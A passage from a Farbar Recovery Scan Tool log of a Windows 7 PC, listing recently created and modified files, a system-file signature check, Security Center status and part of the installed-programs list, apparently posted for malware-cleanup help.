Corporation) C:\Windows\system32\nvinitx.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00146480 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00026353 _____ () C:\Windows\system32\nvinfo.pb2014-08-29 22:31 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll2014-08-29 22:17 - 2014-09-04 01:24 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-28 06:03 - 2014-08-28 06:03 - 00000000 ____D () C:\Program Files\HitmanPro2014-08-28 06:02 - 2014-09-03 21:54 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-28 03:44 - 2014-08-28 03:44 - 00001070 _____ () C:\Users\Matthew Daubenspeck\Documents\byteTHIS.txt2014-08-28 03:29 - 2014-08-28 03:29 - 00000000 ____D () C:\Windows\ERUNT2014-08-28 03:18 - 2014-09-04 07:14 - 00000000 ____D () C:\AdwCleaner2014-08-27 21:53 - 2014-08-22 21:07 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll2014-08-27 21:53 - 2014-08-22 20:45 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll2014-08-27 21:53 - 2014-08-22 19:59 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys2014-08-25 01:39 - 2014-08-25 09:01 - 02621440 _____ () C:\Windows\SysWOW64\㩣灜潲牧浡慤慴歜獡数獲祫氠扡慜灶㐱〮〮摜瑡屡潭畤敬彳湩敶瑮牯⹹慤2014-08-25 01:34 - 2014-08-25 01:34 - 00014220 _____ () C:\Users\Matthew Daubenspeck\Desktop\mrt.exe - Shortcut.lnk2014-08-23 05:02 - 2014-08-23 05:01 - 00041984 _____ (Intel Corporation) C:\Windows\system32\Drivers\USB3Ver.dll2014-08-23 05:00 - 2014-08-23 05:00 - 00016640 _____ (http://www.asmedia.com.tw) C:\Windows\SysWOW64\Drivers\asmtufdriver.sys 2014-08-19 22:08 - 2014-07-31 18:41 - 00348856 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll2014-08-19 22:08 - 2014-07-31 18:16 - 00307384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll2014-08-19 22:08 - 2014-07-25 09:52 - 23645696 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll2014-08-19 22:08 - 2014-07-25 09:02 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb2014-08-19 22:08 - 2014-07-25 09:01 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll2014-08-19 22:08 - 2014-07-25 08:51 - 17524224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll2014-08-19 22:08 - 2014-07-25 08:30 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll2014-08-19 22:08 - 2014-07-25 08:28 - 00548352 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll2014-08-19 22:08 - 2014-07-25 08:28 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll2014-08-19 22:08 - 2014-07-25 08:25 - 02774528 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll2014-08-19 22:08 - 2014-07-25 08:25 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll2014-08-19 22:08 - 2014-07-25 08:11 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll2014-08-19 22:08 - 2014-07-25 08:10 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll2014-08-19 22:08 - 2014-07-25 08:04 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb2014-08-19 22:08 - 2014-07-25 08:03 - 00598016 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll2014-08-19 22:08 - 2014-07-25 08:00 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe2014-08-19 22:08 - 2014-07-25 08:00 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe2014-08-19 22:08 - 2014-07-25 07:59 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll2014-08-19 22:08 - 2014-07-25 07:47 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe2014-08-19 22:08 - 2014-07-25 07:40 - 00452096 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll2014-08-19 22:08 - 2014-07-25 07:34 - 00455168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll2014-08-19 22:08 - 2014-07-25 07:34 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll2014-08-19 22:08 - 2014-07-25 07:33 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll2014-08-19 22:08 - 2014-07-25 07:30 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll2014-08-19 22:08 - 2014-07-25 07:28 - 05824512 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll2014-08-19 22:08 - 2014-07-25 07:28 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll2014-08-19 22:08 - 2014-07-25 07:21 - 02184704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll2014-08-19 22:08 - 2014-07-25 07:19 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll2014-08-19 22:08 - 2014-07-25 07:18 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll2014-08-19 22:08 - 2014-07-25 07:17 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll2014-08-19 22:08 - 2014-07-25 07:17 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll2014-08-19 22:08 - 2014-07-25 07:12 - 00438784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll2014-08-19 22:08 - 2014-07-25 07:10 - 00292864 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll2014-08-19 22:08 - 2014-07-25 07:10 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe2014-08-19 22:08 - 2014-07-25 07:08 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll2014-08-19 22:08 - 2014-07-25 07:06 - 04204032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll2014-08-19 22:08 - 2014-07-25 06:52 - 00367104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll2014-08-19 22:08 - 2014-07-25 06:47 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll2014-08-19 22:08 - 2014-07-25 06:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll2014-08-19 22:08 - 2014-07-25 06:42 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe2014-08-19 22:08 - 2014-07-25 06:39 - 02087936 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl2014-08-19 22:08 - 2014-07-25 06:39 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll2014-08-19 22:08 - 2014-07-25 06:36 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll2014-08-19 22:08 - 2014-07-25 06:34 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll2014-08-19 22:08 - 2014-07-25 06:29 - 00239616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll2014-08-19 22:08 - 2014-07-25 06:23 - 13547008 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll2014-08-19 22:08 - 2014-07-25 06:13 - 00526336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll2014-08-19 22:08 - 2014-07-25 06:07 - 02001920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl2014-08-19 22:08 - 2014-07-25 06:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll2014-08-19 22:08 - 2014-07-25 06:03 - 11772928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll2014-08-19 22:08 - 2014-07-25 05:52 - 02266624 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll2014-08-19 22:08 - 2014-07-25 05:26 - 01431040 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll2014-08-19 22:08 - 2014-07-25 05:17 - 00846336 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll2014-08-19 22:08 - 2014-07-25 05:09 - 00704512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll2014-08-19 22:08 - 2014-07-25 05:05 - 01792512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll2014-08-19 22:08 - 2014-07-25 05:00 - 01169920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll2014-08-19 22:08 - 2014-07-15 22:23 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll2014-08-19 22:08 - 2014-07-15 21:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll2014-08-19 22:08 - 2014-06-30 17:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll2014-08-19 22:08 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll2014-08-19 22:08 - 2014-06-24 21:05 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll2014-08-19 22:08 - 2014-06-24 20:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll2014-08-19 22:08 - 2014-06-15 21:10 - 00985536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys2014-08-19 22:08 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe2014-08-19 22:08 - 2014-06-06 01:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe2014-08-19 22:08 - 2014-06-03 05:02 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll2014-08-19 22:08 - 2014-06-03 05:02 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll2014-08-19 22:08 - 2014-06-03 05:02 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll2014-08-19 22:08 - 2014-06-03 05:02 - 00112064 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe2014-08-19 22:08 - 2014-06-03 04:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll2014-08-19 22:08 - 2014-06-03 04:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll2014-08-19 22:08 - 2014-06-03 04:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll2014-08-19 22:08 - 2014-03-09 16:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe2014-08-19 22:08 - 2014-03-09 16:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll2014-08-19 22:08 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe2014-08-19 22:08 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll2014-08-19 22:07 - 2014-08-06 21:06 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll2014-08-19 22:07 - 2014-08-06 21:01 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll2014-08-19 22:07 - 2014-07-13 21:02 - 01216000 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll2014-08-19 22:07 - 2014-07-13 20:40 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll2014-08-15 04:51 - 2014-08-15 04:51 - 00000000 ____D () C:\Program Files\ASUS2014-08-12 06:17 - 2014-08-12 06:17 - 00000726 _____ () C:\Users\Matthew Daubenspeck\Desktop\Cleaner.exe - Shortcut.lnk2014-08-12 06:05 - 2014-08-12 06:05 - 00000000 ____D () C:\ProgramData\ASUS2014-08-12 04:35 - 2014-08-12 04:35 - 00001600 _____ () C:\Users\Matthew Daubenspeck\Desktop\AsusSetup.exe - Shortcut.lnk2014-08-05 03:13 - 2014-08-05 03:13 - 00002988 _____ () C:\Users\Matthew Daubenspeck\Documents\AUGUST2014.reg ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-04 20:06 - 2014-09-04 20:06 - 00000000 ____D () C:\FRST2014-09-04 20:06 - 2014-06-12 13:51 - 00000924 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job2014-09-04 20:05 - 2014-09-04 07:02 - 00067656 _____ () C:\Windows\WindowsUpdate.log2014-09-04 20:05 - 2014-06-12 07:43 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-09-04 20:00 - 2009-07-13 23:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A02014-09-04 20:00 - 2009-07-13 23:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A02014-09-04 19:58 - 2014-06-18 17:38 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job2014-09-04 19:58 - 2009-07-14 00:13 - 00783158 _____ () C:\Windows\system32\PerfStringBackup.INI2014-09-04 19:53 - 2014-06-12 13:51 - 00000920 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job2014-09-04 19:53 - 2014-06-12 00:19 - 00000000 ____D () C:\ProgramData\Kaspersky Lab2014-09-04 19:52 - 2014-09-04 16:56 - 00000224 _____ () C:\Windows\setupact.log2014-09-04 19:52 - 2014-08-30 02:33 - 00000000 ____D () C:\ProgramData\NVIDIA2014-09-04 19:52 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-09-04 19:49 - 2014-03-14 18:45 - 00000000 ____D () C:\Users\Matthew Daubenspeck\AppData\Local\NVIDIA Corporation2014-09-04 19:49 - 2014-03-14 18:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation2014-09-04 19:49 - 2014-03-14 18:43 - 00000000 ____D () C:\ProgramData\NVIDIA Corporation2014-09-04 19:49 - 2014-03-14 18:43 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation2014-09-04 19:49 - 2014-03-14 18:42 - 00000000 ____D () C:\Program Files\NVIDIA Corporation2014-09-04 19:28 - 2014-09-04 19:28 - 00058832 _____ () C:\Users\Matthew Daubenspeck\AppData\Local\GDIPFONTCACHEV1.DAT2014-09-04 16:56 - 2014-09-04 16:56 - 00269128 _____ () C:\Windows\system32\FNTCACHE.DAT2014-09-04 16:56 - 2014-09-04 16:56 - 00000000 _____ () C:\Windows\setuperr.log2014-09-04 07:20 - 2014-09-04 07:20 - 00000643 _____ () C:\Users\Matthew Daubenspeck\Desktop\JRT.txt2014-09-04 07:14 - 2014-08-28 03:18 - 00000000 ____D () C:\AdwCleaner2014-09-04 07:01 - 2014-09-04 06:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware2014-09-04 06:51 - 2014-09-04 06:51 - 00000862 _____ () C:\Users\Public\Desktop\SUPERAntiSpyware Professional.lnk2014-09-04 06:51 - 2014-09-04 06:51 - 00000538 _____ () C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 76f5f907-df54-4db7-8cca-e9da5ee3a2b2.job2014-09-04 06:51 - 2014-09-04 06:51 - 00000538 _____ () C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 138cf3f9-f67a-4f49-9f2a-da614f7f040b.job2014-09-04 06:51 - 2014-09-04 06:51 - 00000000 ____D () C:\Users\Matthew Daubenspeck\AppData\Roaming\SUPERAntiSpyware.com2014-09-04 06:51 - 2014-09-04 06:51 - 00000000 ____D () C:\ProgramData\SUPERAntiSpyware.com2014-09-04 06:18 - 2014-09-04 06:18 - 00001588 _____ () C:\Users\Matthew Daubenspeck\Desktop\firefox.exe - Shortcut.lnk2014-09-04 06:12 - 2014-09-04 06:12 - 00001058 _____ () C:\Users\Matthew Daubenspeck\Desktop\SUPERAntiSpyware.exe - Shortcut.lnk2014-09-04 05:02 - 2014-06-14 05:22 - 00000000 ____D () C:\Windows\pss2014-09-04 02:46 - 2014-03-15 10:40 - 00000000 ____D () C:\Temp2014-09-04 02:45 - 2009-07-13 21:34 - 00450709 ____R () C:\Windows\system32\Drivers\etc\hosts.20140904-024704.backup2014-09-04 02:43 - 2009-07-13 21:34 - 00000938 ____R () C:\Windows\system32\Drivers\etc\hosts.20140904-024528.backup2014-09-04 01:24 - 2014-08-29 22:17 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-09-04 01:24 - 2009-07-13 21:34 - 00450709 ____R () C:\Windows\system32\Drivers\etc\hosts.20140904-024307.backup2014-09-04 00:36 - 2014-09-04 00:36 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 22014-09-04 00:31 - 2014-09-04 00:31 - 00001054 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk2014-09-04 00:31 - 2014-09-04 00:31 - 00001054 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk2014-09-04 00:31 - 2014-09-04 00:31 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking2014-09-04 00:31 - 2014-09-04 00:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 22014-09-03 21:57 - 2014-09-03 21:57 - 00000404 _____ () C:\Users\Matthew Daubenspeck\Documents\cc_20140903_215716.reg2014-09-03 21:54 - 2014-08-28 06:02 - 00000000 ____D () C:\ProgramData\HitmanPro2014-09-03 21:48 - 2014-09-03 21:48 - 00001231 _____ () C:\Users\Matthew Daubenspeck\Desktop\HitmanPro_x64.exe - Shortcut.lnk2014-09-03 11:14 - 2014-06-13 01:28 - 00000000 ____D () C:\ProgramData\Malwarebytes Anti-Exploit2014-09-03 06:08 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF2014-08-30 05:58 - 2014-06-18 17:38 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater2014-08-30 05:58 - 2014-03-14 17:29 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe2014-08-30 05:58 - 2011-08-24 17:52 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl2014-08-30 02:33 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Help2014-08-28 09:48 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\AppCompat2014-08-28 06:03 - 2014-08-28 06:03 - 00000000 ____D () C:\Program Files\HitmanPro2014-08-28 03:44 - 2014-08-28 03:44 - 00001070 _____ () C:\Users\Matthew Daubenspeck\Documents\byteTHIS.txt2014-08-28 03:29 - 2014-08-28 03:29 - 00000000 ____D () C:\Windows\ERUNT2014-08-28 03:28 - 2009-07-14 00:08 - 00032636 _____ () C:\Windows\Tasks\SCHEDLGU.TXT2014-08-25 09:01 - 2014-08-25 01:39 - 02621440 _____ () C:\Windows\SysWOW64\㩣灜潲牧浡慤慴歜獡数獲祫氠扡慜灶㐱〮〮摜瑡屡潭畤敬彳湩敶瑮牯⹹慤2014-08-25 01:34 - 2014-08-25 01:34 - 00014220 _____ () C:\Users\Matthew Daubenspeck\Desktop\mrt.exe - Shortcut.lnk2014-08-23 05:02 - 2014-03-14 18:30 - 00000000 ____D () C:\Program Files (x86)\Intel2014-08-23 05:01 - 2014-08-23 05:02 - 00041984 _____ (Intel Corporation) C:\Windows\system32\Drivers\USB3Ver.dll2014-08-23 05:01 - 2013-12-20 16:38 - 00790512 _____ (Intel Corporation) C:\Windows\system32\Drivers\iusb3xhc.sys2014-08-23 05:01 - 2013-12-20 16:38 - 00369648 _____ (Intel Corporation) C:\Windows\system32\Drivers\iusb3hub.sys2014-08-23 05:01 - 2013-12-20 16:38 - 00020464 _____ (Intel Corporation) C:\Windows\system32\Drivers\iusb3hcs.sys2014-08-23 05:00 - 2014-08-23 05:00 - 00016640 _____ (http://www.asmedia.com.tw) C:\Windows\SysWOW64\Drivers\asmtufdriver.sys 2014-08-23 05:00 - 2014-07-11 04:12 - 00021400 _____ (http://www.asmedia.com.tw) C:\Windows\system32\Drivers\asmtufdriver.sys 2014-08-22 21:07 - 2014-08-27 21:53 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll2014-08-22 20:45 - 2014-08-27 21:53 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll2014-08-22 19:59 - 2014-08-27 21:53 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys2014-08-20 03:57 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache2014-08-20 01:34 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions2014-08-19 22:11 - 2014-06-12 13:52 - 00002192 _____ () C:\Users\Public\Desktop\Google Chrome.lnk2014-08-19 22:10 - 2014-03-14 17:42 - 00000000 ____D () C:\Windows\system32\MRT2014-08-19 22:10 - 2010-01-07 12:20 - 99218768 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe2014-08-19 22:08 - 2014-06-12 07:38 - 00000000 ___SD () C:\Windows\system32\CompatTel2014-08-19 01:45 - 2014-07-24 02:52 - 00000000 ____D () C:\Program Files (x86)\ASUS2014-08-18 04:44 - 2010-01-07 12:35 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information2014-08-15 05:14 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Registration2014-08-15 04:51 - 2014-08-15 04:51 - 00000000 ____D () C:\Program Files\ASUS2014-08-15 04:49 - 2014-07-24 02:50 - 00045074 _____ () C:\Windows\Ascd_tmp.ini2014-08-12 06:17 - 2014-08-12 06:17 - 00000726 _____ () C:\Users\Matthew Daubenspeck\Desktop\Cleaner.exe - Shortcut.lnk2014-08-12 06:05 - 2014-08-12 06:05 - 00000000 ____D () C:\ProgramData\ASUS2014-08-12 04:35 - 2014-08-12 04:35 - 00001600 _____ () C:\Users\Matthew Daubenspeck\Desktop\AsusSetup.exe - Shortcut.lnk2014-08-11 15:31 - 2014-08-30 02:32 - 01515296 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll2014-08-11 15:31 - 2014-08-30 02:32 - 00197408 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys2014-08-11 15:31 - 2014-08-30 02:32 - 00031520 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll2014-08-06 21:06 - 2014-08-19 22:07 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll2014-08-06 21:01 - 2014-08-19 22:07 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll2014-08-05 09:20 - 2010-01-06 19:20 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe2014-08-05 03:13 - 2014-08-05 03:13 - 00002988 _____ () C:\Users\Matthew Daubenspeck\Documents\AUGUST2014.reg2014-08-05 03:03 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signedC:\Windows\System32\wininit.exe => File is digitally signedC:\Windows\SysWOW64\wininit.exe => File is digitally signedC:\Windows\explorer.exe => File is digitally signedC:\Windows\SysWOW64\explorer.exe => File is digitally signedC:\Windows\System32\svchost.exe => File is digitally signedC:\Windows\SysWOW64\svchost.exe => File is digitally signedC:\Windows\System32\services.exe => File is digitally signedC:\Windows\System32\User32.dll => File is digitally signedC:\Windows\SysWOW64\User32.dll => File is digitally signedC:\Windows\System32\userinit.exe => File is digitally signedC:\Windows\SysWOW64\userinit.exe => File is digitally signedC:\Windows\System32\rpcss.dll => File is digitally signedC:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-08-27 00:12 ==================== End Of Log ============================Additional scan result of Farbar Recovery Scan Tool (x64) Version: 03-09-2014 02Ran by Matthew Daubenspeck at 2014-09-04 20:06:57Running from D:\Google Chrome DownloadsBoot Mode: Normal========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Kaspersky Internet Security (Enabled - Up to date) {179979E8-273D-D14E-0543-2861940E4886}AS: Kaspersky Internet Security (Enabled - Up to date) {ACF8980C-0107-DEC0-3FF3-1313EF89023B}AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}FW: Kaspersky Internet Security (Enabled) {2FA2F8CD-6D52-D016-2E1C-81546ADD0FFD} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)Adobe Flash Player 14 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)Adobe Reader XI (11.0.08) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.5.4.0 - Auslogics Labs Pty Ltd)Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 6.32.223.1 - Broadcom Corporation)CCleaner (HKLM\...\CCleaner) (Version: 4.14 - Piriform)Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) HiddenCisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) HiddenCisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) HiddenCreative Music Server (HKLM-x32\...\Music Server) (Version: 1.01 - Creative Technology Limited)Creative Smart Recorder (HKLM-x32\...\Smart Recorder) (Version: 2.20 - Creative Technology Limited)Creative WaveStudio 7 (HKLM-x32\...\WaveStudio 7) (Version: 7.14 - Creative Technology Limited)CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.0.2014 - CyberLink Corp.)CyberLink Power2Go 8 (x32 Version: 8.0.0.2014 - CyberLink Corp.) HiddenDolby Digital Live Pack (HKLM-x32\...\Dolby Digital Live Pack) (Version: 3.03 - Creative Technology Limited)DTS Connect Pack (HKLM-x32\...\DTS Connect Pack) (Version: 1.00 - Creative Technology Limited)Google Chrome (HKLM-x32\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) HiddenIntel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 15.4 - Intel)Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.3.34 - Intel Corporation)Intel® Trusted Connect Service Client (Version: 1.31.8.1 - Intel Corporation) HiddenKaspersky Internet Security (HKLM-x32\...\InstallWIX_{6F6873E3-5C92-4049-B511-231A138DD090}) (Version: 14.0.0.4651 - Kaspersky Lab)Kaspersky Internet Security (x32 Version: 14.0.0.4651 - Kaspersky Lab) HiddenMalwarebytes Anti-Exploit version 1.03.1.1220 (HKLM\...\Malwarebytes Anti-Exploit_is1) (Version: 1.03.1.1220 - Malwarebytes)Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) HiddenMicrosoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) 